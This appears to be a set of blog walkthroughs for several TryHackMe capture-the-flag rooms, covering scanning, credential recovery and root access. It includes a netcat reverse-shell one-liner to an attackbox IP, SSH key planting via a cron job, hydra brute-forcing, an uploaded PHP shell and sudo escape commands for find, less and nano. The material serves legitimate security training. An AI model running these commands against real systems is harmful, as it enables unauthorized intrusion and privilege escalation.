TryHackMe - Smag Grotto - writeup

Smag Grotto is one of the easy CTF rooms on the TryHackMe.com. Here are my steps that lead me to the successful solution and finding both user and root flag. Before you start you need to boot up the VM and attackbox machine.

1. step
First I have run nmap scan:

nmap -sC VM_IP

Scan gives me that only 2 ports are open - ssh and http. Connection to the page ip, didnt give me much more info.
2. step
I then tried researching the VM with gobuster:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

With gobuster I find /mail folder.
3. step
Then I opened /mail folder where we find the email correspondence with .pcap trace file.
4. step
I have downloaded the pcap file and open it with wireshark.In the trace file I have found the new domain where site is located. I also found the username and password for login.
5. step
To access new domain I have added VM_IP and new domain I have found in .pcap file to the /etc/hosts file on attackbox machine.
6. step
Now I have entered domain to the web browser and found login.php script and enter credentials from .pcap file.
7. step
After the login you are at site where you can enter commands. I had to look around the internet to get hint what to do in this step. In this step we initiate the reverse shell and start nc listener on attack box. I have run:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f

On the attackbox I have started nc listener:

nc -lvnp 1338

8. step
In a second I got shell access as www-data. After that I have checked cronjob settings and see that there is copy of the /opt/.backups/jake_ir_rsa.pub.backup public key to the authorised keys. Hmmm I think we could exploit this one by putting our public key instead of legit key.
9. step
On attackbox machine we can create our public key with following command:

ssh-keygen -t rsa -P '' -f jakekey

then we open key file and copy to the target machine with :

echo "public_key_we_created" > jake_id_rsa.pub.backup

Note that you need to create file in /opt/.backups/ folder and filename needs to be as stated above that cronjob will take our file and we can login to the machine.
10. step
Ok in this step I tried to log in to the machine using key. But of course I bit forgot how to do it so I had to look for little help what is exact command to use ssh keys to connect to the machine.

ssh -i jakekey jake@devleopment.smag.thm

then I pressed enter and I was logged in as jake. We can now search for the user flag.

find / -type f -name user.txt 2>/dev/null

11. step
Then I can open user.txt file and copy the flag.
12. step
Now I was missing only root flag and I could access file only as root. I checked what programs I could run as jake user:

sudo -l

Output of the command showed us that apt-get command can be run as jake user.
13. step
To do so we head over to the GTFObins and we find the command that we can run as current user to get root access.


14. step
We can find root flag at:

cat /root/root.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - Bolt

Bolt is one fo easiest room for beginers on TryHackMe.com After running basic nmap scan:

nmap -sC -sV Target_IP

We can see open ports, most intresting is port 8000 with running BOLT CMS.
After looking around the web page, we find login username and password in post on the page. We can search for vunlrabilities via web search and we can find following for Authenticated Remote Code Execution. How will you tackle this one? I used metasploit and use following module exploit/unix/webapp/bolt_authenticated_r. Throught the metasploit console set up needed variables LHOST, RHOST, USERNAME, PASSWORD and run the exploit. We need to run:

find / -type f -name flag.txt 2>/dev/null

and we get the flag in a seconds. I hope this short and easy tutorial helped anyone getting stucked in solving this room. audittrsi

TryHackMe - h4cked - walkthrough

H4cked is one of easy room on the TryHackMe.com In task 1 we are faced by pcap file of the attack on the VM. Most of the answers in Task 1 are found from pcap file which you open with wireshark. Task 2 in this task you try to regain access to the VM same way as hacker did in task 1.

1. Step

We use hydra to crack new password with following command

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://target_IP

2. Step

We log to the ftp and download the shell.php (get shell.php - is the command) and change IP and port to our attack box and upload it back (put shell.php)
3. Step
Before move to the starting the php script we need to start nc listener on attacking box with


nc -lvnp port_number

4. Step
Now we are ready to start php script shell.php from browser:

IP_target_machine/shell.php

5. Step
We get spawned reverse shell in terminal, with whoami command we check which user we have, then we can use

su jenny

and log in with pass we cracked before with hydra
6. Step
After that we can use

sudo su

and we have root access with this we can read root flag.

I hope someone stucked in any step of solving this room finds this walkthrough useful.

TryHackMe - Pickle Rick - walkthrough

Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
It is a CTF room on TryHackMe page if you are fan of Rick and Morty cartoon you should defently try to solve it. It is not that hard and you can solve it pretty fast.

1. step:
Start target machine that you will try to exploit and start Attackbox machine.
2. step:
As usually we try with nmap scan to check what ports are open on target machine with command:


nmap -sC -sV Target_IP


With only 2 ports open we check the web page
3. step:
There is nothing much on the page but is it? We check the page source code where we find username which might be useful in next steps
4. step:
With use of the gobuster we scan webpage to find hidden files or directories I have used following command:


gobuster dir -t 40 -u 10.10.151.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php,txt -t 60



5. step:
We find the login.php access page but we are missing password. We check the robot.txt file and we get possible password candidate for login. Which turns out that it is actual username and pass.

6. step:
We end up on command panel where we can write some command like ls and we can see interesting files there with Q1 answer ingridient. We try opening filed with cat command File_name.txt but it doesnt allow us.
We try with less command File_name.txt voila we opened it and we can answer first Q1.
7. step:
In this step we check the clue.txt file which says that we should look around directories for second ingridient. We try to get to other directories in /home/rick/ we find the file second ingridients. Since the spaces in files names and linux arent good friends we need to use less command like this:


less '/home/rick/second ingredients'


And voila we have 2nd ingredient and we can answer the Q2.
8. step:
with command

sudo -l

we check what we can run as root.
9. step:
we can try

sudo ls -la /root

and we find 3rd.txt
10. step:
Since we cannot open file in it's folder we can try copying to other directory and change permissions:


sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt

11. step:
In browser open file via Target_IP/3rd.txt. and we can answer last Q3 in this room.

I hope anyone who gets stucked finds this writeup helpful.

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest type of PrivEsc tasks.
With command :

sudo -l

We check what services we can run as root. adn with this info we can answer Q1
From output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to the GTFObins To check for each service/program that we can gain root access to system.

• Find

sudo find . -exec /bin/sh \; -quit

• Less

sudo less /etc/profile
!/bin/sh

• nano

sudo nano
^R^X
reset; sh 1>&0 2>&0

Note about getting root via nano one command at the time ^R - is CTRL + R and ^X CTRL + X
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

that we find path to the flag2.txt file
To answer Q3 we neet to check GTFObins to get command.
To answer Q4 we open /etc/shadow to find answer. I hope this post is helpfull for anyone stuck at solving this task.

TryHackMe - Bounty Hacker -walkthrough

Bounty Hacker is one of easy rooms on TryHackMe.com
I was able to finish it up in couple of minutes with some reference from other similar rooms like this one.

1. First step

In this step you deploy the target VM and start Attackbox if you dont have it up already. It takes a minute or two to start up.


2. Second step

We use nmap to scan target VM.

nmap -A -T4 _IP_target_VM


Command takes some time to scan and display us back what ports are open. You can see 3 ports open 21 with FTP, 22 ssh and 80 apache server.


3. Third step

As FTP is open and it allows you to connect with anonymous user we try to connect to FTP server on target machine with command:

FTP IP_target_VM


When prompted for username you enter anonymous. We check what files we can find on server there are 2 files. One cointains note from one user this is also answer to the Q3 and other is list of what it looks like passwords. You can download files by command:


get file_name



4. Forth step

We will use hydra brute forcing tool to check if any passwords from list we could obtain from FTP server. I used following command:

hydra target_VM_IP ssh -l lin -P path_to_the_password_list -s 22 -vV


SSH user i used the one i found in file on FTP server.


5. Fifth step

After Hydra finish its work and you get correct pass you can ssh to the target VM.


6. Sixth step

When we are logged in server I tried to find user flag and write location of the file into user-flag file:

find / -type f -name user.txt 2>/dev/nul > user-flag 



7. Seventh step

In this step we check what command can current user run as sudo. We use:

sudo -l


As we see now only one command we can run. We had over to the GTFObins and check what command to run. Copy paste command to the command line and voila we have root access.
8. Eighth step

Last step is to find the root.txt file we write its location to root-flag file:

find / -type f -name root.txt 2>/dev/null > /tmp/root-flag 

I hope this helps to the people who might get stucked during solving this room.